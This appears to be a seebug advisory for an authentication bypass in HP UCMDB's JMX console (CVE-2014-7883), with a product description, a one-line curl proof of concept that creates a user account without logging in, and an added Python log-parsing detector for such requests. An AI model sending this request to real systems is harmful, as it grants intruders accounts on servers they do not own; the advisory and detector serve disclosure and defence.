Hewlett-Packard UCMDB - JMX-Console Authentication Bypass

2015-09-06T00:00:00
ID SSV:89314
Type seebug
Reporter Jeremy_he
Modified 2015-09-06T00:00:00

Description

CVE-ID: CVE-2014-7883

Affected versions: UCMDB 10.10 (Other versions might also be affected)

The HP Universal CMDB (UCMDB) automatically collects and manages accurate and current business service definitions, associated infrastructure relationships and detailed information on the assets, and is a central component in many of the key processes in your IT organization, such as change management, asset management, service management, and business service management. The UCMDB ensures that these processes can rely on comprehensive and true data for all business services. Together with HP UCMDB Configuration Manager (UCMDB-CM) you can standardize your IT environments, and make sure they comply with clear policies and a defined authorization process.

Many IT organizations turn to a CMDB and configuration management processes to create a shared single version of truth to support business service management, IT service management, change management, and asset management initiatives. These initiatives help align IT efforts with business requirements and run IT operations more efficiently and effectively.

The initiatives' success depends on the CMDB providing a complete view into the configuration items (CIs) and assets as well as how various IT elements relate together to deliver the business service.

curl -I "http://site:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"
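
For defenders, a log check for requests of the shape shown above, as an added example that is not part of the original advisory or of HP's code. It assumes the front-end web server writes Apache/NCSA combined-format access logs; the sample lines are constructed and `find_jmx_invocations` is a hypothetical helper name.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed log format: NCSA combined (host ident authuser [time] "request" status ...).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET = ("/jmx-console/htmladaptor", "invokeopbyname")

# Constructed sample lines (documentation IP ranges), not taken from a real system.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Sep/2015:10:00:01 +0000] "GET / HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Sep/2015:10:00:05 +0000] "HEAD /jmx-console/HtmlAdaptor'
    '?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services'
    '&methodName=createUser&arg0=&arg1=u1&arg2=u1&arg3=u1&arg4=u1 HTTP/1.1" 200 0',
    '198.51.100.7 - - [06/Sep/2015:10:00:09 +0000] "GET /jmx-console/HtmlAdaptor'
    '?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services'
    '&methodName=createUser&arg1=u2 HTTP/1.1" 401 0',
    '192.0.2.10 - admin [06/Sep/2015:10:02:00 +0000] "GET /jmx-console/HtmlAdaptor'
    '?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services'
    '&methodName=createUser&arg1=u3 HTTP/1.1" 200 0',
]

def find_jmx_invocations(lines):
    """Return one finding per logged request that invokes an MBean operation by name."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # parse_qs decodes %3A, %3D and '+', so the MBean name compares in clear text.
        query = {k.lower(): v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
        if (url.path.rstrip("/").lower(), query.get("action", "").lower()) != TARGET:
            continue
        findings.append({
            "ip": m["ip"],
            # Not filtered on purpose: `curl -I` sends HEAD, which GET-only rules miss.
            "http_method": m["method"],
            "mbean": query.get("name", ""),
            "operation": query.get("methodname", ""),
            # No authenticated user logged and no error status: accepted anonymously.
            "unauthenticated": m["user"] == "-" and int(m["status"]) < 400,
        })
    return findings

if __name__ == "__main__":
    for finding in find_jmx_invocations(SAMPLE_LOG):
        print(finding)
```

Findings with `unauthenticated` set to true and `operation` equal to `createUser` are the ones to follow up by reviewing the accounts that exist in UCMDB.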